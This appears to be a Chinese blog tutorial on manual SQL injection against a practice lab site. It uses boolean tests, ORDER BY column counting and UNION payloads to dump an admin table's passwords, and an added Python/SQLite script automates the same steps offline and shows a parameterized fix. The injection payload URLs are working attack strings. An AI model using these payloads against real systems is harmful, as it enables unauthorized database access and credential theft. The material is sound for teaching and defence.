Demonstration of SQL injection on a practice target machine

SQL injection is one of the most dangerous vulnerabilities at the web application layer. This article walks through the full process of a manual SQL injection against a practice target: a boolean test to confirm the flaw, then union-based extraction of the database contents.

Note: for practice targets only; do not use this against systems you are not authorized to test.

So let's begin. First open our practice range, the Maoshe target:

http://cntj8003.ia.aqlab.cn/

In the middle of the page there is a "click to view news" link; click it to jump to the news page.

Notice that an extra ?id=1 has appeared in the URL bar.

Change ?id=1 to ?id=2, ?id=3, ?id=4, ?id=5 ... and try each one.

Each id corresponds to a different page, so the value is evidently used to look up a record in the database.

Next, go back to the page with id=1 and append and 1=2 after id=1, building a logical condition to test whether the site is vulnerable to SQL injection:

http://cntj8003.ia.aqlab.cn/?id=1 and 1=2

With and 1=2 appended, the page shows no content; change and 1=2 to and 1=1 and the content comes back.

This is a logical AND. Treat the original condition (id=1), which displays the page normally, as true. 1=2 is false, so id=1 AND 1=2 is false, the query returns no row, and the page is empty. 1=1 is true, so id=1 AND 1=1 is true, the row is returned, and the page has content again. The fact that the server's behaviour follows a condition we wrote into the URL means our input is being parsed as part of the SQL statement rather than treated as a plain value.

From this it can be concluded that the site is vulnerable to SQL injection. What follows is union-based injection: the result of a query we append is echoed onto the page.

Next, use order by to determine the number of columns in the query:

http://cntj8003.ia.aqlab.cn/?id=1 order by 1

order by 1 and order by 2 display the page normally, but order by 3 does not, because ORDER BY with a number refers to a column position and the third position does not exist in the query.

So the query returns two columns.

Then use a union select statement to find which column is echoed to the page.

First add and 1=2 so the original query returns nothing and the page is blank, then append the union:

http://cntj8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,2

A "2" is echoed in the middle of the page, showing that the second column of the result is what the page renders; anything we place in that position will be displayed.

Replace the 2 from the previous step with database():

http://cntj8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,database()

The page now shows maoshe, which is the echoed name of the current database.

With the database name known, the next step is to look up the table names:

http://cntj8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema= database() limit 0,1

table_name from information_schema.tables reads table names from the information_schema metadata database; where table_schema= database() restricts the result to tables in the current database; limit 0,1 means offset 0, one row, that is, the first table name.

The page echoes admin, which is the first table name. Increasing the offset (limit 1,1, limit 2,1, ...) lists any further tables.

After getting the table name, look up its column names:

http://cntj8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name= 'admin' limit 0,1

This echoes the first column name. Note that the filter matches table_name across every database visible to the account; adding and table_schema= database() to the where clause keeps the result to the current database.

The first column name is Id; change limit 0,1 to limit 1,1 to get the second column name.

The second column name is username, and in the same way (limit 2,1) the third is password.

From the names, Id is the record number, username the user name, and password the password.

Finally, retrieve the data itself:

http://cntj8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,password from admin limit 0,1

password from admin limit 0,1 fetches the first value of the password column from the admin table.

The page echoes hellohack, the first password.

In the same way, by changing the column name and the offset, all the data in the admin table can be dumped:

admin
Id username password
1 admin hellohack
2 ppt receive wechat zkaqbanban

That is the complete process of manual injection.
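Added example (not part of the original post): the steps above reproduced offline against a small SQLite model of the vulnerable page, so the boolean test, the ORDER BY column count and the UNION extraction can be run and checked without touching the live target. Everything in it is an assumption for illustration: the page is modelled as SELECT title, body FROM news WHERE id=<value>, the news and admin tables and their rows are constructed sample data, and, because SQLite has no information_schema, sqlite_master and pragma_table_info() stand in for information_schema.tables and information_schema.columns. The hardened lookup at the end shows the fix: validate the id and bind it as a parameter instead of concatenating it into the query.

```python
"""Offline SQLite model of the vulnerable news page (constructed example)."""
import sqlite3

# Constructed sample data standing in for the practice target's database.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO news VALUES (1, 'First article', 'hello');
INSERT INTO news VALUES (2, 'Second article', 'world');
CREATE TABLE admin (Id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO admin VALUES (1, 'admin', 'hellohack');
INSERT INTO admin VALUES (2, 'editor', 's3cret');
"""


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, id_param):
    """Models the page: the ?id= value is concatenated into the SQL text.
    Returns the rows the page would render, or None when the SQL errors
    (the page then shows nothing, as with 'order by 3')."""
    sql = "SELECT title, body FROM news WHERE id=" + id_param
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def safe_lookup(conn, id_param):
    """Hardened form: check the type, then bind the value as a parameter.
    The payload can no longer change the structure of the query."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []  # reject non-numeric ids (a 400 in a real handler)
    return conn.execute(
        "SELECT title, body FROM news WHERE id=?", (id_value,)
    ).fetchall()


def boolean_test(conn):
    """Step 1: 'and 1=1' keeps the row, 'and 1=2' empties the result."""
    true_rows = vulnerable_lookup(conn, "1 and 1=1")
    false_rows = vulnerable_lookup(conn, "1 and 1=2")
    return bool(true_rows) and false_rows == []


def column_count(conn):
    """Step 2: ORDER BY n errors once n exceeds the SELECT's column count."""
    n = 1
    while vulnerable_lookup(conn, f"1 order by {n}") is not None:
        n += 1
    return n - 1


def union_extract(conn, expr):
    """Step 3: 'and 1=2' empties the real result so the UNION row is what
    the page renders; expr lands in the echoed (second) column."""
    rows = vulnerable_lookup(conn, f"1 and 1=2 union select 1,{expr}")
    return rows[0][1] if rows else None


def enumerate_rows(conn, select_tail):
    """Walk 'limit 0,1', 'limit 1,1', ... until nothing comes back.
    UNION (without ALL) deduplicates and may reorder rows, in SQLite as in
    MySQL, so callers must not rely on the order returned."""
    out = []
    i = 0
    while True:
        value = union_extract(conn, f"{select_tail} limit {i},1")
        if value is None:
            return out
        out.append(value)
        i += 1


def table_names(conn):
    # MySQL equivalent: table_name from information_schema.tables
    #                   where table_schema=database()
    return enumerate_rows(conn, "name from sqlite_master where type='table'")


def column_names(conn, table):
    # MySQL equivalent: column_name from information_schema.columns
    #                   where table_schema=database() and table_name='<table>'
    return enumerate_rows(conn, f"name from pragma_table_info('{table}')")


def dump_column(conn, table, column):
    # Step 4: e.g. 'password from admin limit 0,1', 'limit 1,1', ...
    return enumerate_rows(conn, f"{column} from {table}")


if __name__ == "__main__":
    db = new_db()
    print("injectable:", boolean_test(db))
    print("columns in query:", column_count(db))
    print("tables:", table_names(db))
    print("admin columns:", column_names(db, "admin"))
    print("admin passwords:", dump_column(db, "admin", "password"))
    print("hardened lookup with payload:", safe_lookup(db, "1 and 1=2"))
```

Run it as a script to see each step's result. The deduplication caveat in enumerate_rows is the one practical difference from walking offsets by hand on the live page: with plain UNION, two identical values in the dumped column collapse into one row, so use union all when a column is expected to contain duplicates.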

This article is for learning only; using it for anything illegal is forbidden!


Origin blog.csdn.net/BYZY1314/article/details/127734570